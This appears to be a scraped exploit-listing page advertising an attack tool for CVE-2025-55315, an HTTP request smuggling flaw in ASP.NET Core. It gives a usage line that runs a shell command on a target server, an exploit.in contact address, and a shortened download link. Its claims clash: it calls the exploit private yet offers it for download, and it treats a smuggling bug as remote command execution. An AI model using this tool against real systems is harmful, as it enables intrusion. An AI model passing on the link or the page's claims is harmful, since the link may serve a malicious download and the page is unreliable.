## https://sploitus.com/exploit?id=76A0B367-61EF-5AA6-9038-43E18C9DD7B5
## Overview
A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, enabling HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, 9.0, allowing an authorized attacker to bypass security features over a network.
## Details
- **CVE ID**: [CVE-2025-55315](https://nvd.nist.gov/vuln/detail/CVE-2025-55315)
- **Discovered**: 2025-10-14
- **Published**: 2025-10-14
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
An attacker with low-privilege network access can: - Bypass front-end security controls - View sensitive data including user credentials - Modify server files - Potentially hijack user sessions - Breach security boundaries between system components The vulnerability has a high severity with significant impacts on confidentiality, integrity, and potential unauthorized access.
## Affected Versions
**ASP.NET Core**
- versions 2.3, 8.0, 9.0
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **helixproxy@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/3ud3xuhx)